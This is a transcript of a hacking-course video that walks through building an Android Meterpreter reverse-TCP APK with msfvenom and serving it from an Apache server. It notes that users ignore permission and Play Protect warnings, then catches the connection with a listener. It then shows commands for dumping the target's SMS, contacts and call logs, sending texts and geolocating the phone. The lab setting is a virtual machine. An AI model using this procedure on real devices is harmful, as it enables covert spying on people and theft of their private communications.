Welcome back. Let's hack our Android device with the help of the Android payload that we will craft with MSF Venom. So this is going to be our first attack. We're already familiar with both MSF Console and MSF Venom, so we can go straight into hacking the target. Now, if you might be asking why am I using ZSH right here, well, I just decided to switch the terminal a little bit, and I'm going to go and use ZSH throughout this section, most of the time actually. But nonetheless, you can use the regular terminal like this, whatever you feel like. It is exactly the same, it just looks a little bit different. But nonetheless, what is important for this attack is that you have your Cal Linux machine opened and you have your Android machine open right here. So once you get both of these things open, the first thing that we want to do is, as usual, we want to check out the IP address of our Cal Linux machine. We need the IP address in order to craft the payload. Once we check it out, in my case it is 192.168.1.9, we want to generate the MSF Venom payload for the Android device. But this is something that we haven't done before. We used Meterpreter, we used Windows Reverse DCP, and all of those different payloads, but we never really saw how an Android payload looks like. Well, this is the first time, and in order to craft it, let us first navigate to the desktop, and let's run the command MSF Venom -p, and then the name of the payload, which is Android/Meterpreter/reverse_DCP. And you will already notice that this is a Meterpreter payload. So we're going to get all of those cool options that we can use in the post-exploitation with this Meterpreter Android payload. Once we set the payload, we need to set the L host, and in my case that is 192.168.1.9, and the L port can be anything, so I'm just going to go with 5555. Once I set this, I want to output it as the file that can run on Android. Android has .apk files. Those are applications that can run on Android device, so we must make sure that our payload has the extension of apk. We can call it, for example, shell, and then .apk. This is a must. If you type something like .exe or .py, it won't work. So make sure you add .apk, and once you craft the entire command, press enter. And while this payload is being created, let's go to the second terminal. I will enter ZSH, and I will go and start the Apache 2 web server, just so we can actually transfer the payload from our Cal Linux machine to the Android device. I'm going to enter my password right here, and once the Apache 2 has been started, we can go back to the first terminal. We can see the payload has been created. If I type ls, we will have it right here, which is shell.apk. And what I'm going to do right now is I'm going to move that shell.apk to the /var/www/html directory on our Cal Linux machine, because that directory is the web server directory. Permission denied. That is because this directory requires root privileges, so let's just type sudo and then move it to that directory. If I go there, type ls, we're going to have our shell.apk there. Now that we have that ready, let's go and start MSF Console. While it is starting, we're going to go to our Android device, and here is where it gets tricky a little bit. As I mentioned in the theory video, there are a lot of things that the target has to do in order for this payload to be executed. The first thing that they have to do is they actually have to visit your link where your payload is. In our case, or in my case, it is under the IP address of 192.168.1.9. So I'm going to visit that payload, and we're going to see this shell.apk right here. If they click on that, the download will finish, and then they have to click on open. Now, this can only be achieved if your target, for example, thinks that the payload is something that they want to download. In other words, if they suspect of the payload being anything else but the thing that they want to download, this will most likely fail and they will never download your application and run it. Especially once they reach this part right here. If they actually read what this application will be able to do, it tells us that it will get access to modifying system settings, take pictures and videos, modify your contacts, record audio, directly call phone numbers, read call logs, read phone status and identity, and write call logs. And this is not the only thing. If we click on next, it gives us even more things that this application will be able to do, which is read your text messages, receive text messages, modify or delete contents of your SD card. And none application should be able to do all of these things. However, most of them will not read through this. They will just click on install. The application will take a few seconds to install, and it will tell you that this app was built for an older version of Android and doesn't include the latest privacy protections. If they click on install anyway, the app will fully be installed. They might get this warning right here. It depends on the Android version. It says PlayProtect hasn't seen this app before. To protect yourself and others, send it for a security scan. They will most likely, if they came up to this point, they will not send anything for the scan, and they will just run the application. But before we actually run it, we need to set up a listener inside of our MSF console. So let's go and type use exploit, multi-handler, and let's set the payload to be Android Meterpreter reverse TCP. We need to set the L host to be 192.168.1.9 and set L port to be 5555. Once we do all of that, we can press run, and while our listener is being executed, they can run the application, which on their screen nothing will actually happen. But if we go back to our Kali Linux machine, we have the Meterpreter session 1 opened. And if I type get user ID, I will see what is the user ID of the target. If I type help, I will see all of the available commands that I can run on the target Android device. And we can see it's not really the same as for the Windows Meterpreter shell. We have a few new things such as screen share. We have 2 fully new sections of the commands such as Android commands right here. Here we can use activity start, check root, dump call log, dump contacts, dump SMS, geolocate, hide app icon, and many other things. We can even send SMS. However, if you try any of these commands in an actual virtual machine, of course they will not work because we cannot send an SMS from a virtual machine. But if you were to hack an actual Android device, you can type send SMS, then -d, and as it says right here, -d specifies the destination address. In our case, that should be a phone number. So you specify the phone number that you want to send this to. It can be anything. And -t is the actual text that you want to send. It must be a text between the double quotes, and you can type anything such as hello world. Of course, this won't work because our target is an actual virtual machine, but if you were to once again hack an actual Android device, this will send a text message to this phone number with this hello world message. Cool, right? And that is just one of the commands that you can do. You can dump all of the SMS messages. If you type dump_SMS, this will print out all of the messages that that target has stored. So you can see what the target has talked with other people. You can even go and try to dump contacts in order to get all of the contacts from their phone. You can dump call logs to see all of the people that they actually had a voice call with. There are other cool options as well, such as VLAN geolocate, and it says get current lat long using LAN information. And this lat long is simply just latitude and longitude. In the application controller commands, what you can do is you can install different applications. You can list applications. If I type app_list, for some reason this time it will time out. But nonetheless, that could be because of this send SMS message. We're going to check out this app list in the next video once we try out different attack. But one more thing I want to show you before I close off with this video is that actual place where your application got installed. If I just close this Google Chrome first, is if you go to the applications, which you can go to by clicking on this arrow right here, you will have this main activity with the Android logo. And this is our payload. This is the virus that we sent to the target. In order to uninstall it, you can simply just hold on to it a little bit and then drag it to the uninstall. And this will uninstall the payload from the Android device. Just in case you're testing on a real Android device and you want to make sure that you delete it afterwards, you can do that. Nonetheless, this is our first attack on an Android device, and in the next video we're going to check out a similar attack with the Android payload just by using a different tool. And then we're also going to test out the Android application commands. See you in the next video.